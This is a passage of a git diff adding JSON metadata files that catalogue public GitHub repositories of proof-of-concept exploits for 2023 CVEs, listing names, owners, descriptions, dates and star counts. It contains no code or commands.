false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "bash", + "checker", + "cve-2023-0159", + "exploit", + "wordpress", + "wordpress-plugin", + "wpbakery" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0179.json b/2023/CVE-2023-0179.json new file mode 100644 index 0000000000..260696e2fc --- /dev/null +++ b/2023/CVE-2023-0179.json @@ -0,0 +1,64 @@ +[ + { + "id": 591523271, + "name": "CVE-2023-0179-PoC", + "full_name": "TurtleARM\/CVE-2023-0179-PoC", + "owner": { + "login": "TurtleARM", + "id": 1218718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1218718?v=4", + "html_url": "https:\/\/github.com\/TurtleARM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TurtleARM\/CVE-2023-0179-PoC", + "description": null, + "fork": false, + "created_at": "2023-01-21T01:02:01Z", + "updated_at": "2024-11-12T06:25:19Z", + "pushed_at": "2024-03-29T00:19:09Z", + "stargazers_count": 209, + "watchers_count": 209, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 209, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 614641482, + "name": "CVE-2023-0179-PoC", + "full_name": "H4K6\/CVE-2023-0179-PoC", + "owner": { + "login": "H4K6", + "id": 83515195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83515195?v=4", + "html_url": "https:\/\/github.com\/H4K6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4K6\/CVE-2023-0179-PoC", + "description": "针对(CVE-2023-0179)漏洞利用 该漏洞被分配为CVE-2023-0179,影响了从5.5到6.2-rc3的所有Linux版本,该漏洞在6.1.6上被测试。 漏洞的细节和文章可以在os-security上找到。", + "fork": false, + "created_at": "2023-03-16T02:20:52Z", + "updated_at": "2024-10-10T22:26:49Z", + "pushed_at": "2023-03-16T02:22:28Z", + "stargazers_count": 205, + "watchers_count": 205, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 205, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0264.json b/2023/CVE-2023-0264.json new file mode 100644 index 0000000000..6d9d15e7a2 --- /dev/null +++ b/2023/CVE-2023-0264.json @@ -0,0 +1,33 @@ +[ + { + "id": 610322253, + "name": "CVE-2023-0264", + "full_name": "twwd\/CVE-2023-0264", + "owner": { + "login": "twwd", + "id": 8222565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8222565?v=4", + "html_url": "https:\/\/github.com\/twwd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twwd\/CVE-2023-0264", + "description": "A small PoC for the Keycloak vulnerability CVE-2023-0264", + "fork": false, + "created_at": "2023-03-06T14:42:19Z", + "updated_at": "2024-11-28T01:07:46Z", + "pushed_at": "2023-03-06T15:47:30Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0266.json b/2023/CVE-2023-0266.json new file mode 100644 index 0000000000..2be3d6b835 --- /dev/null +++ b/2023/CVE-2023-0266.json @@ -0,0 +1,33 @@ +[ + { + "id": 769797107, + "name": "claude_opus_cve_2023_0266", + "full_name": "SeanHeelan\/claude_opus_cve_2023_0266", + "owner": { + "login": "SeanHeelan", + "id": 1920339, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1920339?v=4", + "html_url": "https:\/\/github.com\/SeanHeelan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SeanHeelan\/claude_opus_cve_2023_0266", + "description": "Demo showing Claude Opus does not find CVE-2023-0266", + "fork": false, + "created_at": "2024-03-10T04:41:34Z", + "updated_at": "2024-05-20T22:14:44Z", + "pushed_at": "2024-03-19T14:18:20Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0297.json b/2023/CVE-2023-0297.json new file mode 100644 index 0000000000..b4a445a233 --- /dev/null +++ b/2023/CVE-2023-0297.json @@ -0,0 +1,188 @@ +[ + { + "id": 586854096, + "name": "CVE-2023-0297_Pre-auth_RCE_in_pyLoad", + "full_name": "bAuh0lz\/CVE-2023-0297_Pre-auth_RCE_in_pyLoad", + "owner": { + "login": "bAuh0lz", + "id": 15223611, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15223611?v=4", + "html_url": "https:\/\/github.com\/bAuh0lz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bAuh0lz\/CVE-2023-0297_Pre-auth_RCE_in_pyLoad", + "description": "CVE-2023-0297: The Story of Finding Pre-auth RCE in pyLoad", + "fork": false, + "created_at": "2023-01-09T11:44:09Z", + "updated_at": "2024-08-12T20:29:15Z", + "pushed_at": "2023-01-14T04:40:47Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 601937653, + "name": "CVE-2023-0297", + "full_name": "Small-ears\/CVE-2023-0297", + "owner": { + "login": "Small-ears", + "id": 56350031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56350031?v=4", + "html_url": "https:\/\/github.com\/Small-ears", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Small-ears\/CVE-2023-0297", + "description": "poc", + "fork": false, + "created_at": "2023-02-15T06:28:40Z", + "updated_at": "2023-03-31T06:17:35Z", + "pushed_at": "2023-02-17T05:32:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 643598552, + "name": "CVE-2023-0297", + "full_name": "JacobEbben\/CVE-2023-0297", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2023-0297", + "description": "Unauthenticated Remote Code Execution in PyLoad <0.5.0b3.dev31", + "fork": false, + "created_at": "2023-05-21T17:09:05Z", + "updated_at": "2024-11-27T17:39:12Z", + "pushed_at": "2023-05-21T17:15:18Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 654170026, + "name": "CVE-2023-0297", + "full_name": "overgrowncarrot1\/CVE-2023-0297", + "owner": { + "login": "overgrowncarrot1", + "id": 78485709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78485709?v=4", + "html_url": "https:\/\/github.com\/overgrowncarrot1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/overgrowncarrot1\/CVE-2023-0297", + "description": null, + "fork": false, + "created_at": "2023-06-15T14:28:05Z", + "updated_at": "2023-09-03T21:03:02Z", + "pushed_at": "2023-06-15T14:35:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 857813726, + "name": "exploit_CVE-2023-0297", + "full_name": "btar1gan\/exploit_CVE-2023-0297", + "owner": { + "login": "btar1gan", + "id": 92728059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92728059?v=4", + "html_url": "https:\/\/github.com\/btar1gan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/btar1gan\/exploit_CVE-2023-0297", + "description": "New exploit for pyLoad v0.5.0 - Unauthenticated remote code excecution", + "fork": false, + "created_at": "2024-09-15T17:15:33Z", + "updated_at": "2024-09-15T17:19:52Z", + "pushed_at": "2024-09-15T17:18:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 867618979, + "name": "CVE-2023-0297", + "full_name": "S4MY9\/CVE-2023-0297", + "owner": { + "login": "S4MY9", + "id": 119887905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119887905?v=4", + "html_url": "https:\/\/github.com\/S4MY9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S4MY9\/CVE-2023-0297", + "description": "RCE in pyload prior to 0.5.0b3.dev31.", + "fork": false, + "created_at": "2024-10-04T12:03:54Z", + "updated_at": "2024-10-04T12:09:24Z", + "pushed_at": "2024-10-04T12:09:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0315.json b/2023/CVE-2023-0315.json new file mode 100644 index 0000000000..91560029c9 --- /dev/null +++ b/2023/CVE-2023-0315.json @@ -0,0 +1,33 @@ +[ + { + "id": 594862535, + "name": "CVE-2023-0315", + "full_name": "mhaskar\/CVE-2023-0315", + "owner": { + "login": "mhaskar", + "id": 6861215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6861215?v=4", + "html_url": "https:\/\/github.com\/mhaskar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhaskar\/CVE-2023-0315", + "description": "The official exploit for Froxlor Remote Code Execution CVE-2023-0315", + "fork": false, + "created_at": "2023-01-29T21:20:26Z", + "updated_at": "2024-10-14T21:55:53Z", + "pushed_at": "2023-01-29T21:23:58Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0386.json b/2023/CVE-2023-0386.json new file mode 100644 index 0000000000..d5f1dfd459 --- /dev/null +++ b/2023/CVE-2023-0386.json @@ -0,0 +1,376 @@ +[ + { + "id": 630377180, + "name": "CVE-2023-0386", + "full_name": "veritas501\/CVE-2023-0386", + "owner": { + "login": "veritas501", + "id": 25763545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4", + "html_url": "https:\/\/github.com\/veritas501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veritas501\/CVE-2023-0386", + "description": null, + "fork": false, + "created_at": "2023-04-20T08:51:20Z", + "updated_at": "2024-06-07T14:56:32Z", + "pushed_at": "2023-04-20T08:52:29Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 636233940, + "name": "linux-4.19.72_CVE-2023-0386", + "full_name": "Satheesh575555\/linux-4.19.72_CVE-2023-0386", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.19.72_CVE-2023-0386", + "description": null, + "fork": false, + "created_at": "2023-05-04T11:55:43Z", + "updated_at": "2023-06-01T06:17:17Z", + "pushed_at": "2023-05-04T12:37:07Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 636517717, + "name": "CVE-2023-0386", + "full_name": "xkaneiki\/CVE-2023-0386", + "owner": { + "login": "xkaneiki", + "id": 26479696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26479696?v=4", + "html_url": "https:\/\/github.com\/xkaneiki", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xkaneiki\/CVE-2023-0386", + "description": "CVE-2023-0386在ubuntu22.04上的提权", + "fork": false, + "created_at": "2023-05-05T03:02:13Z", + "updated_at": "2024-11-19T10:40:48Z", + "pushed_at": "2023-06-13T08:58:53Z", + "stargazers_count": 386, + "watchers_count": 386, + "has_discussions": false, + "forks_count": 65, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 65, + "watchers": 386, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 636975790, + "name": "CVE-2023-0386", + "full_name": "chenaotian\/CVE-2023-0386", + "owner": { + "login": "chenaotian", + "id": 86546351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4", + "html_url": "https:\/\/github.com\/chenaotian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenaotian\/CVE-2023-0386", + "description": "CVE-2023-0386 analysis and Exp", + "fork": false, + "created_at": "2023-05-06T06:07:23Z", + "updated_at": "2024-11-19T09:49:23Z", + "pushed_at": "2023-05-06T06:19:25Z", + "stargazers_count": 117, + "watchers_count": 117, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 117, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 637591035, + "name": "CVE-2023-0386", + "full_name": "3yujw7njai\/CVE-2023-0386", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-0386", + "description": "CVE-2023-0386 EXP", + "fork": false, + "created_at": "2023-05-08T01:53:50Z", + "updated_at": "2023-12-08T03:39:45Z", + "pushed_at": "2023-05-08T01:57:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 638165405, + "name": "kernel_v4.19.72_CVE-2023-0386", + "full_name": "hshivhare67\/kernel_v4.19.72_CVE-2023-0386", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.19.72_CVE-2023-0386", + "description": null, + "fork": false, + "created_at": "2023-05-09T08:11:58Z", + "updated_at": "2023-05-09T10:34:30Z", + "pushed_at": "2023-05-09T10:36:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 641369164, + "name": "CVE-2023-0386", + "full_name": "sxlmnwb\/CVE-2023-0386", + "owner": { + "login": "sxlmnwb", + "id": 65052912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65052912?v=4", + "html_url": "https:\/\/github.com\/sxlmnwb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxlmnwb\/CVE-2023-0386", + "description": "Vulnerabilities Exploitation On Ubuntu 22.04", + "fork": false, + "created_at": "2023-05-16T10:26:10Z", + "updated_at": "2024-11-19T10:51:32Z", + "pushed_at": "2023-05-16T10:49:19Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-0386" + ], + "visibility": "public", + "forks": 2, + "watchers": 34, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 659614929, + "name": "CVE-2023-0386", + "full_name": "Fanxiaoyao66\/CVE-2023-0386", + "owner": { + "login": "Fanxiaoyao66", + "id": 104337898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104337898?v=4", + "html_url": "https:\/\/github.com\/Fanxiaoyao66", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fanxiaoyao66\/CVE-2023-0386", + "description": "非常简单的CVE-2023-0386's exp and analysis.Use c and sh.", + "fork": false, + "created_at": "2023-06-28T07:49:52Z", + "updated_at": "2024-11-19T01:24:21Z", + "pushed_at": "2023-06-28T07:55:23Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735013638, + "name": "CVE-2023-0386", + "full_name": "puckiestyle\/CVE-2023-0386", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2023-0386", + "description": null, + "fork": false, + "created_at": "2023-12-23T11:01:55Z", + "updated_at": "2024-07-25T08:49:58Z", + "pushed_at": "2023-12-23T11:12:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765025096, + "name": "CVE-2023-0386", + "full_name": "letsr00t\/CVE-2023-0386", + "owner": { + "login": "letsr00t", + "id": 38699989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4", + "html_url": "https:\/\/github.com\/letsr00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/letsr00t\/CVE-2023-0386", + "description": null, + "fork": false, + "created_at": "2024-02-29T06:22:50Z", + "updated_at": "2024-02-29T06:22:51Z", + "pushed_at": "2024-02-29T06:23:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 782345345, + "name": "CVE-2023-0386", + "full_name": "churamanib\/CVE-2023-0386", + "owner": { + "login": "churamanib", + "id": 155580704, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155580704?v=4", + "html_url": "https:\/\/github.com\/churamanib", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/churamanib\/CVE-2023-0386", + "description": null, + "fork": false, + "created_at": "2024-04-05T05:47:00Z", + "updated_at": "2024-04-05T05:49:33Z", + "pushed_at": "2024-04-05T06:01:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 790464197, + "name": "CVE-2023-0386-libs", + "full_name": "EstamelGG\/CVE-2023-0386-libs", + "owner": { + "login": "EstamelGG", + "id": 46676047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46676047?v=4", + "html_url": "https:\/\/github.com\/EstamelGG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EstamelGG\/CVE-2023-0386-libs", + "description": "CVE-2023-0386 包含所需运行库", + "fork": false, + "created_at": "2024-04-22T23:33:35Z", + "updated_at": "2024-04-23T12:53:20Z", + "pushed_at": "2024-04-23T12:53:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0400.json b/2023/CVE-2023-0400.json new file mode 100644 index 0000000000..77cc4fe2bc --- /dev/null +++ b/2023/CVE-2023-0400.json @@ -0,0 +1,33 @@ +[ + { + "id": 833053713, + "name": "CVE-2023-0400", + "full_name": "pinpinsec\/CVE-2023-0400", + "owner": { + "login": "pinpinsec", + "id": 94911442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94911442?v=4", + "html_url": "https:\/\/github.com\/pinpinsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pinpinsec\/CVE-2023-0400", + "description": "trellix DLP Bypass", + "fork": false, + "created_at": "2024-07-24T09:04:55Z", + "updated_at": "2024-07-24T09:22:49Z", + "pushed_at": "2024-07-24T09:22:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0461.json b/2023/CVE-2023-0461.json new file mode 100644 index 0000000000..56dfec4d11 --- /dev/null +++ b/2023/CVE-2023-0461.json @@ -0,0 +1,33 @@ +[ + { + "id": 638224867, + "name": "kernel_v4.19.72_CVE-2023-0461", + "full_name": "hshivhare67\/kernel_v4.19.72_CVE-2023-0461", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.19.72_CVE-2023-0461", + "description": null, + "fork": false, + "created_at": "2023-05-09T10:44:10Z", + "updated_at": "2023-05-09T10:55:14Z", + "pushed_at": "2023-05-09T12:34:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0464.json b/2023/CVE-2023-0464.json new file mode 100644 index 0000000000..9cea4d5e0e --- /dev/null +++ b/2023/CVE-2023-0464.json @@ -0,0 +1,33 @@ +[ + { + "id": 631830330, + "name": "Openssl_1.1.1g_CVE-2023-0464", + "full_name": "Trinadh465\/Openssl_1.1.1g_CVE-2023-0464", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/Openssl_1.1.1g_CVE-2023-0464", + "description": null, + "fork": false, + "created_at": "2023-04-24T06:40:37Z", + "updated_at": "2023-04-24T06:43:56Z", + "pushed_at": "2023-04-24T06:44:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0630.json b/2023/CVE-2023-0630.json new file mode 100644 index 0000000000..610497ca7e --- /dev/null +++ b/2023/CVE-2023-0630.json @@ -0,0 +1,38 @@ +[ + { + "id": 651513086, + "name": "CVE-2023-0630", + "full_name": "RandomRobbieBF\/CVE-2023-0630", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-0630", + "description": "CVE-2023-0630 - Slimstat Analytics < 4.9.3.3 - Subscriber+ SQL Injection", + "fork": false, + "created_at": "2023-06-09T12:02:55Z", + "updated_at": "2023-06-25T00:31:23Z", + "pushed_at": "2023-06-12T10:57:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-0630", + "exploit", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0656.json b/2023/CVE-2023-0656.json new file mode 100644 index 0000000000..94f55c95e4 --- /dev/null +++ b/2023/CVE-2023-0656.json @@ -0,0 +1,33 @@ +[ + { + "id": 742585090, + "name": "CVE-2022-22274_CVE-2023-0656", + "full_name": "BishopFox\/CVE-2022-22274_CVE-2023-0656", + "owner": { + "login": "BishopFox", + "id": 4523757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4", + "html_url": "https:\/\/github.com\/BishopFox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BishopFox\/CVE-2022-22274_CVE-2023-0656", + "description": null, + "fork": false, + "created_at": "2024-01-12T20:03:51Z", + "updated_at": "2024-11-28T00:21:37Z", + "pushed_at": "2024-01-12T20:15:47Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 19, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0669.json b/2023/CVE-2023-0669.json new file mode 100644 index 0000000000..c5c2d538b7 --- /dev/null +++ b/2023/CVE-2023-0669.json @@ -0,0 +1,161 @@ +[ + { + "id": 600041726, + "name": "CVE-2023-0669", + "full_name": "0xf4n9x\/CVE-2023-0669", + "owner": { + "login": "0xf4n9x", + "id": 40891670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40891670?v=4", + "html_url": "https:\/\/github.com\/0xf4n9x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xf4n9x\/CVE-2023-0669", + "description": "CVE-2023-0669 GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.", + "fork": false, + "created_at": "2023-02-10T13:02:55Z", + "updated_at": "2024-08-12T20:29:46Z", + "pushed_at": "2024-04-16T09:20:45Z", + "stargazers_count": 100, + "watchers_count": 100, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 100, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 602298086, + "name": "CVE-2023-0669", + "full_name": "cataliniovita\/CVE-2023-0669", + "owner": { + "login": "cataliniovita", + "id": 60446603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60446603?v=4", + "html_url": "https:\/\/github.com\/cataliniovita", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cataliniovita\/CVE-2023-0669", + "description": "CVE-2023-0669 GoAnywhere MFT command injection vulnerability", + "fork": false, + "created_at": "2023-02-15T23:00:18Z", + "updated_at": "2023-02-15T23:00:18Z", + "pushed_at": "2023-02-15T23:00:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604487308, + "name": "CVE-2023-0669", + "full_name": "Griffin-01\/CVE-2023-0669", + "owner": { + "login": "Griffin-01", + "id": 59146115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59146115?v=4", + "html_url": "https:\/\/github.com\/Griffin-01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Griffin-01\/CVE-2023-0669", + "description": null, + "fork": false, + "created_at": "2023-02-21T06:52:28Z", + "updated_at": "2023-02-21T06:52:28Z", + "pushed_at": "2023-02-21T06:52:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + 